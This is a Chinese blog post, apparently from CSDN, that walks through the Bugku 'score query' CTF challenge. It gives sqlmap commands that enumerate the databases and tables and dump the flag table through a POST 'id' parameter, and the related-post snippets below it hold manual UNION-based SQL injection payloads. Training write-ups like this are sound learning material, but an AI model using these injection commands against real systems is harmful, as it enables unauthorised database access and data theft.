Bugku 成绩查询【WEB】

已于 2022-08-15 13:45:42 修改
阅读量450 收藏 1
点赞数 2
分类专栏: CTF学习系列 文章标签: 网络协议 安全 sql
于 2022-08-15 13:45:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/soysauce123/article/details/126344753
版权

从0开始学CTF[WEB篇]

Bugku 成绩查询【WEB】

大家好,作为一个CTF方面的小白,以后我也希望每做一次题目就和大家分享分享自己的解题过程
今天我们要讲的是:
在这里插入图片描述
今天咱们尝试用一下一个新的工具,sqlmap,这是一个用于sql注入等等相关的一个很不错的工具。
话不多说我们先打开靶场
在这里插入图片描述
欸,虽然但是我好像没看出啥嘞(狗头)好啦好啦我们先打开f12看看。嘿嘿看看我发现了啥
在这里插入图片描述
post
我们都清楚http的请求方式有两种一个get,一个post,这里就是post
然后这里我们是用登陆框的形式输入的,我们就可以想到post登陆框注入。
【虽然这里我一开始也是不清楚的所以大家可以先通过这个了解一下post登录框实践】post登录框三种注入方式
那我就用第一种呗
输入一个数字之后用bp抓包
在这里插入图片描述
放大点在这里插入图片描述
复制保存在txt文件中方便等会我们可以利用sqlmap对其进行注入查询
然后就可以开始查询了,先搜索库
-r的意思是读取文件,你要是读网站肯定就不是-r了这个要注意一下
在这里插入图片描述

sqlmap.py -r "D:\post.txt" -p id --dbs

然后我们会发现一些东西
在这里插入图片描述
看看找到了啥,四个库~~就我分析这个ctf就很显眼,我估计就是这个嘿嘿
然后差表
在这里插入图片描述

sqlmap.py -r "D:\post.txt" -p id -D skctf --tables

记住这个是tables不是table我刚刚还在疑问怎么老是查不到看了半天才发现
然后得到了里面含有的表
在这里插入图片描述
flag嘛估计就是在fl4g里面我们继续打开
在这里插入图片描述

sqlmap.py -r "D:\post.txt" -p id -D skctf --table -T fl4g --columns

打开了后得到列里面含有的东西
在这里插入图片描述
那现在这就是里面最后的文件里,【确信】flag肯定就在里面了打开他!!!
在这里插入图片描述

sqlmap.py -r "D:\post.txt" -p id -D skctf --tables -T fl4g -C "skctf_flag" --dump

然后就可以得到啦
在这里插入图片描述

最后我们输入到bugku中就可以了
感谢大家收看

酱油牌酱油菌
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Bugku-web成绩查询
weixin_42939822的博客
03-14 3418
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugkuctf解题-WEB
05-04
bugku writeup,web解题writeup,根据网上的writeup自行解题后整理的日记,与大家分享,大家有新方法的也可以评论中告诉我,共同进步。——CTF菜鸟敬上。
BugKu——Web——成绩查询
m_de_g的博客
09-02 1874
BugKu——Web——成绩查询 1.拿到题目先测试注入点,分别输入了1,2,3,4;输入到4的时候没有回显 2.当我们输入1'时会报错,而我们使用1'#时就不会报错 3.测试or,and等关键字 1' or 1=1# 1' and 1=2# 发现没有被过滤 4.判断列名 1' order by 1,2,3# 三列,四列的时候依然回显正常,而当我们输入第五列的时候报错,说明有四列1' order by 1,2,3,4,5# 5.查看显位点 -1' union select 1,2,3,4#
BUGKU CTF--web 基础{成绩查询}
lulu001128的博客
12-03 790
BUGKU CTF--web 基础{成绩查询}解题过程
BUGKU-成绩查询
m0_64180167的博客
12-03 905
打开环境 随便输入 发现URL 不传参 怀疑是POST型于是我们查看源代码发现是POST型打开终端因为是POST型 所以有两种方式语法:sqlmap -r "txt地址"kali中要下载数据包 我们在物理windows系统上的BP进行抓取 打包成文件然后把后缀改成.txt 通过共享文件传输到kali中,或者直接从桌面拖到kali桌面中打开sqlmap运行指令sqlmap -r "bugku.txt"于是我们开始爆破库sqlmap -r "bugku.txt" --tables 把库名和表名爆出来了然后我们发
bugku WEB 成绩查询
weixin_52665674的博客
11-28 579
bugku web题:成绩查询
BugKu_web17(成绩查询
羽的博客
05-08 322
成绩查询,数据库交互,那就在考察SQL注入漏洞。 正常输入1,2,3试试。 就正常步骤判断是否存在sql注入。 输入1 有反应 输入1’ 没有反应 判断是数字型注入
bugku web 成绩查询
cuddlylm的博客
06-25 176
输入1试试 输入2的回显 输入3的回显 怀疑是sql注入 输入1'的回显,报错 1 and 1=1 回显如下 就可以确定时sql注入里的整数型注入了 1、查字段用order by 先试试id=1' order by 4# 用 ' 闭合前面的句子,用 # 注释后面的句子 再试试id=1' order by 5# 没有回显,就说明这里只有四个字段。 2、然后就是要看它的显位点有几个,用id=-1' union select 1,2,3,4#,这里用id=-1时因为如果用id=1或者其他数据库里面.
bugku-writeup-web-成绩查询
dark的博客
06-16 223
bugku-web成绩查询解题思路记录。” 题目
Bugkuweb 成绩
qq_26961571的博客
06-23 255
从这里开始进入SQL注入的普通模式啦!!撒花~~ ​ 虽然真的学过数据库,可是需要有很熟悉的PHP和数据库变量名字的理解,大概才能很好的学习这个部分。 首先打开这个题目, 快来查查成绩吧! 这里还是有一些提示的,框框里面要求输入1,2,3这种数字以便查询。但是...我们怎么能用普通的思维呢???!! 那么先什么都不输入看看。 什么都木有啊! 还是输个1看看。 接下来输了2和3也是有数据的,4就没有数据了,感觉这个数据库表...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 看到url上的参数有base64,解码发现是key.txt 把改参数换成index.php,观察发现line按行返回 所以自己练练手写了个脚本跑出来
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
Bugku CTF:成绩查询[WriteUP]
最新发布
如有错误感谢斧正
11-25 314
看抓到的包最下面是id,选择注入点为:id进行注入。这里我把包信息txt保存为post.txt。复制Raw内容进txt文件用于sql注入。直接展示skctf_flag中的值即可。很明显应该就是‘skctf’
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2157
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
CTF/CTF练习平台-成绩查询sqlmap post方法】
Sp4rkW的博客
08-30 5059
原题内容: 快来查查成绩吧 http://120.24.86.145:8002/chengjidan/ 学习资料: SQLMap中文参数用户手册 sqlmap WAF绕过/tamper详解 这题还是很基本的注入,首先手工尝试 延时五秒显示,结果是和只输入1一样,很明显,这是一个注入点,然后sleep既然是有效果的,不烦试一试sqlmap 这里用到了post方...
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 502
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
CTF练习题[WEB]-成绩查询
weixin_45246254的博客
01-05 1823
https://ctf.bugku.com/challenges/detail/id/84.html?page=4 拿到题目如下 查询处考虑sql注入 查询一下 没有报错信息,直接把请求包丢到sqlmap里面 发现union注入 查看当前数据库 查看数据表 发现f14g表 直接dump 获得flag ...
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

酱油牌酱油菌

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值